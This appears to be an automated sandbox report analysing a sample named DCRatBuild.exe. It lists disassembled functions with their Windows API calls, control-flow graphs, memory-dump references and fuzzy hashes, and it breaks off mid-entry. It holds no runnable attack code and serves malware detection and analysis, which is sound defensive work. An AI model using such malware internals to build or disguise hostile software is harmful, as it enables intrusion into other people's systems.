                                      • GetLastError.KERNEL32(?,?,00F078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F09A96
                                      • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00F078AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00F09ADB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: File$CreateErrorLast$Time
                                      • String ID:
                                      • API String ID: 1999340476-0
                                      • Opcode ID: cf252a0f476855fa3fe2803de7d4898408eb2b6c4e130f7e4b0d51ef4010c19a
                                      • Instruction ID: ccd05b2c0b138e1c6f2a3ec847f12f5eeeac8113b54415c7d61a646545a475d0
                                      • Opcode Fuzzy Hash: cf252a0f476855fa3fe2803de7d4898408eb2b6c4e130f7e4b0d51ef4010c19a
                                      • Instruction Fuzzy Hash: 19414871A487466FE720DB20CC05BDABBD4BB05334F100719F5E4961D2E7B9A988FB91
                                      Function 00F1AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1004 f1ac74-f1ac8d PeekMessageW 1005 f1acc8-f1accc 1004->1005 1006 f1ac8f-f1aca3 GetMessageW 1004->1006 1007 f1aca5-f1acb2 IsDialogMessageW 1006->1007 1008 f1acb4-f1acc2 TranslateMessage DispatchMessageW 1006->1008 1007->1005 1007->1008 1008->1005
                                      APIs
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F1AC85
                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F1AC96
                                      • IsDialogMessageW.USER32(00010414,?), ref: 00F1ACAA
                                      • TranslateMessage.USER32(?), ref: 00F1ACB8
                                      • DispatchMessageW.USER32(?), ref: 00F1ACC2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Message$DialogDispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 1266772231-0
                                      • Opcode ID: 6b7fbceecd7c9bcd29e29e76f671defbd124cf722e7703311319b005c258021d
                                      • Instruction ID: 4a90631a0977c562b706d77e63a8af7fc9b24858c43331472f01a57e45dc6acf
                                      • Opcode Fuzzy Hash: 6b7fbceecd7c9bcd29e29e76f671defbd124cf722e7703311319b005c258021d
                                      • Instruction Fuzzy Hash: 05F01D71D0212DBBCB609BE19C4CDEF7F6CEE052A17404515F915D2150EA64D445E7F1
                                      Function 00F276BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1009 f276bd-f276ca 1010 f276e8-f27711 call f2b290 GetModuleFileNameA 1009->1010 1011 f276cc-f276d0 1009->1011 1017 f27713-f27716 1010->1017 1018 f27718 1010->1018 1011->1010 1013 f276d2-f276e3 call f2895a call f28839 1011->1013 1023 f277dc-f277e0 1013->1023 1017->1018 1020 f2771a-f27744 call f277e1 call f27956 1017->1020 1018->1020 1027 f27752-f2776f call f277e1 1020->1027 1028 f27746-f27750 call f2895a 1020->1028 1034 f27771-f2777e 1027->1034 1035 f27787-f2779a call f2ada3 1027->1035 1033 f27783-f27785 1028->1033 1036 f277d1-f277db call f284de 1033->1036 1034->1033 1041 f277a1-f277aa 1035->1041 1042 f2779c-f2779f 1035->1042 1036->1023 1044 f277b4-f277c1 1041->1044 1045 f277ac-f277b2 1041->1045 1043 f277c7-f277ce call f284de 1042->1043 1043->1036 1044->1043 1045->1044 1045->1045
                                      APIs
                                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 00F276FD
                                      • _free.LIBCMT ref: 00F277C8
                                      • _free.LIBCMT ref: 00F277D2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
                                      • API String ID: 2506810119-1920316638
                                      • Opcode ID: a82e0a91c429157653668ee975b4469d8e1eab097e13f5adf2fd9cd0fc535a78
                                      • Instruction ID: d90ce227cf7daaa8b3a4dc7bdd6635af7f8b158a6083f3881e9310052415cdc5
                                      • Opcode Fuzzy Hash: a82e0a91c429157653668ee975b4469d8e1eab097e13f5adf2fd9cd0fc535a78
                                      • Instruction Fuzzy Hash: DC31B375E09328AFDB21EF99EC81D9EBBFCEB84710F1441A6F80497211D6B44E41EB50
                                      Function 00F1A335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00F10085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00F100A0
                                        • Part of subcall function 00F10085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00F0EB86,Crypt32.dll,00000000,00F0EC0A,?,?,00F0EBEC,?,?,?), ref: 00F100C2
                                      • OleInitialize.OLE32(00000000), ref: 00F1A34E
                                      • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F1A385
                                      • SHGetMalloc.SHELL32(00F48430), ref: 00F1A38F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                      • String ID: riched20.dll
                                      • API String ID: 3498096277-3360196438
                                      • Opcode ID: 82d74cf245f51fbb2c6475bc84c9c40574445037cb59f7d7749b7c5e7cce4344
                                      • Instruction ID: 78a8b8051ae13c245db7a0455cfae6bd10060082556c269c4e26836c9be36c64
                                      • Opcode Fuzzy Hash: 82d74cf245f51fbb2c6475bc84c9c40574445037cb59f7d7749b7c5e7cce4344
                                      • Instruction Fuzzy Hash: 22F049B1D0020EABCB50AF99D8499EFFBFCEF95301F00415AE824E2200CBB856459BA1
                                      Function 00F1D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1052 f1d287-f1d2b2 call f1e360 SetEnvironmentVariableW call f0fbd8 1056 f1d2b7-f1d2bb 1052->1056 1057 f1d2bd-f1d2c1 1056->1057 1058 f1d2df-f1d2e3 1056->1058 1059 f1d2ca-f1d2d1 call f0fcf1 1057->1059 1062 f1d2c3-f1d2c9 1059->1062 1063 f1d2d3-f1d2d9 SetEnvironmentVariableW 1059->1063 1062->1059 1063->1058
                                      APIs
                                      • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00F1D29D
                                      • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F1D2D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: EnvironmentVariable
                                      • String ID: sfxcmd$sfxpar
                                      • API String ID: 1431749950-3493335439
                                      • Opcode ID: 13ed23008673a6c7ac6fd943e349562e4a2c12c642ae343000c8f702c19bc03e
                                      • Instruction ID: a232f0bfcb33cfe9fb84f14e5b9f257f8bb7ea3045fde685c8bda50e2b27146e
                                      • Opcode Fuzzy Hash: 13ed23008673a6c7ac6fd943e349562e4a2c12c642ae343000c8f702c19bc03e
                                      • Instruction Fuzzy Hash: 8EF0A7B2D0022CA6D7206F909C0AEFA7B69EF09BA1F000411FC4456151D675CD84F6F1
                                      Function 00F0984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00F0985E
                                      • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00F09876
                                      • GetLastError.KERNEL32 ref: 00F098A8
                                      • GetLastError.KERNEL32 ref: 00F098C7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FileHandleRead
                                      • String ID:
                                      • API String ID: 2244327787-0
                                      • Opcode ID: 9e1ebba723c6c1033fee26dadd3fc86f9ab7dd4d773bf67e7fbc5facbb7e40c0
                                      • Instruction ID: 780637be6dd8966f8389d738775aeac9f42c48de759eb2c40a6a0b7c3bc6c6f0
                                      • Opcode Fuzzy Hash: 9e1ebba723c6c1033fee26dadd3fc86f9ab7dd4d773bf67e7fbc5facbb7e40c0
                                      • Instruction Fuzzy Hash: A411CE31D08208EBDB209B51C804A7977E9FB42731F90C12AF82A857C2F7B99E44BF51
                                      Function 00F2A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00F0CFE0,00000000,00000000,?,00F2A49B,00F0CFE0,00000000,00000000,00000000,?,00F2A698,00000006,FlsSetValue), ref: 00F2A526
                                      • GetLastError.KERNEL32(?,00F2A49B,00F0CFE0,00000000,00000000,00000000,?,00F2A698,00000006,FlsSetValue,00F37348,00F37350,00000000,00000364,?,00F29077), ref: 00F2A532
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00F2A49B,00F0CFE0,00000000,00000000,00000000,?,00F2A698,00000006,FlsSetValue,00F37348,00F37350,00000000), ref: 00F2A540
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: LibraryLoad$ErrorLast
                                      • String ID:
                                      • API String ID: 3177248105-0
                                      • Opcode ID: 27fd0612c84837056f8dad2b9517aa223aece681aaadc2e1a41150aec9d8c75e
                                      • Instruction ID: e26f1f4ddc31523eddd5aeabb6571216fba04e756504f08e27f96679a57eabff
                                      • Opcode Fuzzy Hash: 27fd0612c84837056f8dad2b9517aa223aece681aaadc2e1a41150aec9d8c75e
                                      • Instruction Fuzzy Hash: 0F012B36B1123AABC721CB68BC45B577B99AF45BB17180520F906D7240D735DD00EAE1
                                      Function 00F09F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,00F0CC94,00000001,?,?,?,00000000,00F14ECD,?,?,?), ref: 00F09F4C
                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00F14ECD,?,?,?,?,?,00F14972,?), ref: 00F09F8E
                                      • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,00F0CC94,00000001,?,?), ref: 00F09FB8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileWrite$Handle
                                      • String ID:
                                      • API String ID: 4209713984-0
                                      • Opcode ID: 55067de34e9e08eca68a0d8ad6fa42aff377ebd05b71daa471f5d24218310563
                                      • Instruction ID: fa68d3ee2034832946290e3d160ae1c84aac71e7f8e5a4fce939192ebbe39802
                                      • Opcode Fuzzy Hash: 55067de34e9e08eca68a0d8ad6fa42aff377ebd05b71daa471f5d24218310563
                                      • Instruction Fuzzy Hash: FB31047160C30A9BDF148F14D94876ABBA8EB40721F044658F945DA1C2D7B4D848FBA2
                                      Function 00F0A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A22E
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A261
                                      • GetLastError.KERNEL32(?,?,?,?,00F0A113,?,00000001,00000000,?,?), ref: 00F0A27E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$ErrorLast
                                      • String ID:
                                      • API String ID: 2485089472-0
                                      • Opcode ID: ad60bbc7a47f589f2983879e05aa8a914a7174fd4152a170f22b28ffa4ad4511
                                      • Instruction ID: 3584ad3e903167da27da73e5d9060f461fe9aaecc7b366b015ddaf3c1e6faf19
                                      • Opcode Fuzzy Hash: ad60bbc7a47f589f2983879e05aa8a914a7174fd4152a170f22b28ffa4ad4511
                                      • Instruction Fuzzy Hash: 4501B13694071866EB32EB744C06BEE3358AF0B7A1F0444A1FC41D60D1DB6ACA81F6B3
                                      Function 00F2AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00F2B019
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Info
                                      • String ID:
                                      • API String ID: 1807457897-3916222277
                                      • Opcode ID: a26a287180fe3bccfd3dadd7274d92266104c5a4148f72ad2de5b7df201d0f39
                                      • Instruction ID: a0b1cdf4b5dff400d8a68cb88b72e581ea76c1b3860dc14b652e0b2ccfe37ffb
                                      • Opcode Fuzzy Hash: a26a287180fe3bccfd3dadd7274d92266104c5a4148f72ad2de5b7df201d0f39
                                      • Instruction Fuzzy Hash: 1341277190436C9BDF22CE249C94BF7BBA9EB45304F1404ECE99A87142D335AE55EF60
                                      Function 00F2A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 00F2A79D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: String
                                      • String ID: LCMapStringEx
                                      • API String ID: 2568140703-3893581201
                                      • Opcode ID: 19acadcea91fb4e29981bc2e044b3697aa8fd62414f5f1daff041985e9547165
                                      • Instruction ID: 9e50f5dca8fe13875de62306036ebb2815ff1ca226e7e7e46d9b46833fda5c24
                                      • Opcode Fuzzy Hash: 19acadcea91fb4e29981bc2e044b3697aa8fd62414f5f1daff041985e9547165
                                      • Instruction Fuzzy Hash: 9A01C27254421DBBCF12AFA4EC06DEE3F66EF18760F044154FE1466160CA76C921FB92
                                      Function 00F2A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                      Download Yara Rule
                                      APIs
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00F29D2F), ref: 00F2A715
                                      Strings
                                      • InitializeCriticalSectionEx, xrefs: 00F2A6E5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: CountCriticalInitializeSectionSpin
                                      • String ID: InitializeCriticalSectionEx
                                      • API String ID: 2593887523-3084827643
                                      • Opcode ID: 9ce9883c626f65d3fb6d65e3c2c46defdaecc7f6b772f0e93d6987df6b38662a
                                      • Instruction ID: 64a22ca115705fb9f7b20e7ba8f10927147986a87ce4ea5f0a3111570a58cd77
                                      • Opcode Fuzzy Hash: 9ce9883c626f65d3fb6d65e3c2c46defdaecc7f6b772f0e93d6987df6b38662a
                                      • Instruction Fuzzy Hash: 3CF0E231A4522CBBCB11BF64DC06CAE7FA2EF54730F004064FC095A260DA718E20FB92
                                      Function 00F2A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Alloc
                                      • String ID: FlsAlloc
                                      • API String ID: 2773662609-671089009
                                      • Opcode ID: bfc10c6c7e9c53fc4936473cf03b26bf6a749fe1a5a6291878aa058582038d1f
                                      • Instruction ID: 13b56387861bccc91e4ab9053d7aa4f46679aedb8c86c3062ee1ed4f23f1777d
                                      • Opcode Fuzzy Hash: bfc10c6c7e9c53fc4936473cf03b26bf6a749fe1a5a6291878aa058582038d1f
                                      • Instruction Fuzzy Hash: D6E0E571B4523C6BD220BB64AC079AEBB95DF65B30F450155FC095B240DE748E00B6D6
                                      Function 00F2329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00F232AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 00df45bc9d5d4e3ec9d3308e6e2df2d3d871c103a5270dbcbf66a9d2ae572122
                                      • Instruction ID: 2c28232de6c082bd7b30f84f2623e4afd21fc3448480325846a7d7348c2e255d
                                      • Opcode Fuzzy Hash: 00df45bc9d5d4e3ec9d3308e6e2df2d3d871c103a5270dbcbf66a9d2ae572122
                                      • Instruction Fuzzy Hash: 84D02B61B816386BC11032C07C039EE7E448741FB1F450152FE081E1828569C55071D7
                                      Function 00F1D8F2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00F1D8A3
                                        • Part of subcall function 00F1DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00F1DFD6
                                        • Part of subcall function 00F1DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00F1DFE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
